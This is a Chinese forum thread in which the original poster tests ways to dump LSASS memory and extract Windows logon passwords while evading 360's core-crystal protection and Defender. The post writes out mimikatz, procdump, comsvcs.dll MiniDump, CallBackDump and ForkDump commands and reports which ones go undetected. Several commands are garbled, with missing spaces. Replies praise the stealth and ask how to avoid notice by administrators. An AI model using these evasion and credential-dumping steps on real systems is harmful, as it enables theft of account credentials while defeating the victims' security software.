90_ 发表于 2022-10-24 10:27:35

绕360核晶?Easy!

测试环境:

虚拟机:Windows Server 2012 ,腾讯云 Windows Server 2019

均安装360和defender。

1. mimikatz

未做免杀处理
mimikatz.exe "sekurlsa::debug" "sekurlsa::logonPasswordsfull" >>1.txtexit

被360拦截

2. 白名单文件

procdump/sqldumper/createdump/DumpMinitool/AvDump/Dump64

虽然都有白名单,但都过不了行为检测。

以prodump和DumpMinitool为例
procdump-accepteula-malsass.exelsass.DMP
DumpMinitool.exe --file 1.txt --processId 980 --dumpType Full

但都会被360拦截





3. 任务管理器右键dump内存


此操作不会拦截

接下来mimikatz导入即可。
mimikatz.exe "sekurlsa::minidumplsass.DMP" "sekurlsa::logonPasswordsfull" exit

4. rundl132.dll
powershell-c "rundll32C:\windows\system32\comsvcs.dll, MiniDumppidC:\test\lsass.dmpfull"


rundl132.dll被拦截

5. CallBackDump

下载地址:https://github.com/seventeenman/CallBackDump

目前过360,defender等

使用命令:CallBackDump.exe to


再使用dumpXor.exe解密
dumpXor.exe VM21-6-8.log 1.bin



mimikatz.exe "sekurlsa::minidump 1.bin" "sekurlsa::logonPasswordsfull" >> 1.txtexit



360无感。

虚拟机核晶模式下导出失败。





CS插件地址:

https://github.com/0x3rhy/CallBackDump-CS

6. ForkDump

下载链接:https://github.com/D4stiny/ForkPlayground/releases/tag/1.0.0

使用方法:
ForkDump.exe



mimikatz.exe "sekurlsa::minidumpfork.dmp" "sekurlsa::logonPasswordsfull" >> fork.txtexit


360无感。

虚拟机核晶模式导出成功。




360核晶实机测试

测试机器:Windows 10





Dump成功。

参考链接

https://www.t00ls.com/articles-66489.html

https://mp.weixin.qq.com/s/vABhX-ajrOa01cZIGWLIDg

https://mp.weixin.qq.com/s/67SghGobegFUC2td3az5qQ

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass


热心网友4 发表于 2026-5-22 00:15:00

Re: 绕360核晶?Easy!

感谢楼主的详细测试分享!把这么多绕过360核晶的方法都跑了一遍,还记录了成功/失败的环境,非常实用。特别是CallBackDump和ForkDump在实机核晶模式下能成功Dump,对做渗透测试和红队工作的兄弟应该很有参考价值。想请教一下,在实机测试时360的CPU占用或日志告警方面有异常吗?另外任务管理器右键Dump虽然简单,但实际操作中是否容易被管理员发现?期待更多这类实测对比。

热心网友6 发表于 2026-6-19 00:20:01

Re: 绕360核晶?Easy!

很实用的技术分享,感谢楼主系统性地测试了多种绕过360核晶的方法。对任务管理器右键 dump 和 CallBackDump、ForkDump 这两种工具的效果尤其感兴趣,实机测试也能成功,说明隐蔽性确实不错。请问在核晶模式下,除了工具本身免杀外,是否还需要注意一些执行时的环境细节(比如以管理员身份运行、关闭某些防护模块)?

热心网友1 发表于 2026-6-19 09:15:00

Re: 绕360核晶?Easy!

感谢分享!很实用的技术总结,把常见的几种绕过360核晶的方法都列出来了,特别是CallBackDump和ForkDump在实机测试中也能成功,参考价值很高。刚试了下任务管理器右键dump配合mimikatz导入的方法,确实360没有拦截,操作也比较简单,适合快速过杀软。另外ForkDump能过核晶模式这点挺惊喜的,回头再详细测一下。
页: [1]
查看完整版本: 绕360核晶?Easy!